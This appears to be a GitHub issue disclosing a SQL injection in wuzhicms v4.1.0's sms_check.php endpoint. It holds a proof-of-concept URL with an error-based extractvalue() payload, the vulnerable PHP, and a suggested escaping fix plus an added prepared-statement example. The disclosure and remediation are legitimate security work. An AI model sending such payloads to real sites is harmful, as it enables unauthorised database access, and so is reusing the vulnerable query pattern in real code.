
wuzhicms v4.1.0 have a sqli in the front #138

Open
love71 opened this issue May 28, 2018 · 1 comment
love71 commented May 28, 2018

POC:
/api/sms_check.php?param=1%27and extractvalue(1,concat(0x7e,user()))%23
Vulnerability file: /api/sms_check.php
<?php
define('WWW_ROOT', substr(dirname(__FILE__), 0, -4).'/');
require '../configs/web_config.php';
require COREframe_ROOT.'core.php';

// $GLOBALS['param'] carries the request parameter "param" used in the PoC URL.
if(!isset($GLOBALS['param'])) {
    exit('{"info":"验证失败","status":"n"}'); // "verification failed"
} elseif($GLOBALS['param']=='') {
    exit('{"info":"验证失败","status":"n"}'); // "verification failed"
}
// strip_tags() only removes HTML tags; a single quote passes through untouched,
// so the value can terminate the quoted literal in the query below.
$code = strip_tags($GLOBALS['param']);
$posttime = SYS_TIME-300; // codes are valid for 5 minutes
$db = load_class('db');
// $code is interpolated straight into the WHERE clause: this is the injection point.
$r = $db->get_one('sms_checkcode',"code='$code' AND posttime>$posttime",'*',0,'id DESC');
if($r) {
    exit('{"info":"验证通过","status":"y"}'); // "verification passed"
} else {
    exit('{"info":"验证失败","status":"n"}'); // "verification failed"
}

The $code parameter is passed directly into the get_one function without any filtering, and the get_one function does not filter the incoming SQL either, resulting in SQL injection.
Reproduced successfully against the official website.

love71 changed the title from 五指CMS v4.1.0前台存在SQL注入 (Wuzhi CMS v4.1.0 has a SQL injection in the front end) to "wuzhicms v4.1.0 have a sqli in the front" on May 28, 2018

scccco commented Jul 24, 2020

$db = load_class('db');
// Escape the value for use inside the single-quoted literal before it is interpolated.
$code = mysqli_real_escape_string($db->master_db->link,$code);
$r = $db->get_one('sms_checkcode',"code='$code' AND posttime>$posttime",'*',0,'id DESC');
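The following is an added example, not code from wuzhicms or from either commenter. It shows what the PoC payload turns the query into, the escaping fix suggested above, and a prepared-statement alternative. The `SELECT` text is an assumption about what `get_one` builds (the page only shows the call, not the generated SQL); the table and column names come from the snippet in the report, and the `mysqli` connection details are placeholders.

```php
<?php
// Added example (not wuzhicms code). Demonstrates the injection in
// /api/sms_check.php and two ways of closing it.
// Assumption: get_one() assembles a query shaped like the $vuln string below;
// the exact SQL it generates is not shown in the issue.

// The PoC payload from the report, as PHP sees it after URL decoding.
$param = "1'and extractvalue(1,concat(0x7e,user()))#";
$posttime = time() - 300;

// 1. Vulnerable: strip_tags() removes HTML tags only; the single quote survives
//    and closes the literal, so everything after it is executed as SQL.
$code = strip_tags($param);
$vuln = "SELECT * FROM sms_checkcode WHERE code='$code' AND posttime>$posttime ORDER BY id DESC LIMIT 1";
echo $vuln, "\n";
// Result: ... WHERE code='1'and extractvalue(1,concat(0x7e,user()))#' AND posttime>...
// The '#' comments out the rest of the line; extractvalue() with a malformed
// XPath raises an error whose message contains user(), which the PoC reads back.

// 2. Escaping, as proposed in the follow-up comment. The quote becomes \' and
//    stays inside the literal. This is only correct for values that are wrapped
//    in quotes in the SQL text; $posttime is interpolated bare, so it must stay
//    an integer computed by the script, never a request value.
function build_escaped(mysqli $link, string $param, int $posttime): string
{
    $code = mysqli_real_escape_string($link, strip_tags($param));
    return "SELECT * FROM sms_checkcode WHERE code='$code' AND posttime>$posttime ORDER BY id DESC LIMIT 1";
}

// 3. Prepared statement: the value never becomes part of the SQL text, so
//    neither quoting nor the connection charset can be abused.
function check_code(mysqli $link, string $param, int $posttime): bool
{
    $stmt = $link->prepare(
        'SELECT id FROM sms_checkcode WHERE code = ? AND posttime > ? ORDER BY id DESC LIMIT 1'
    );
    $stmt->bind_param('si', $param, $posttime);
    $stmt->execute();
    $found = $stmt->get_result()->fetch_assoc() !== null;
    $stmt->close();
    return $found;
}

// Placeholder connection (assumed host/credentials); needed for steps 2 and 3.
// $link = new mysqli('127.0.0.1', 'user', 'pass', 'wuzhicms');
// $link->set_charset('utf8mb4'); // escaping is only charset-safe once this is set
// echo build_escaped($link, $param, $posttime), "\n";
// var_dump(check_code($link, $param, $posttime)); // bool(false) for the PoC payload
```

Two practical checks when applying the escaping fix: confirm that every interpolated value is actually inside quotes in the final query (a bare numeric parameter would still be injectable), and call `set_charset()` on the connection before `mysqli_real_escape_string()`, since the escaping is only reliable for the charset the connection is configured with. The prepared-statement version avoids both concerns.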
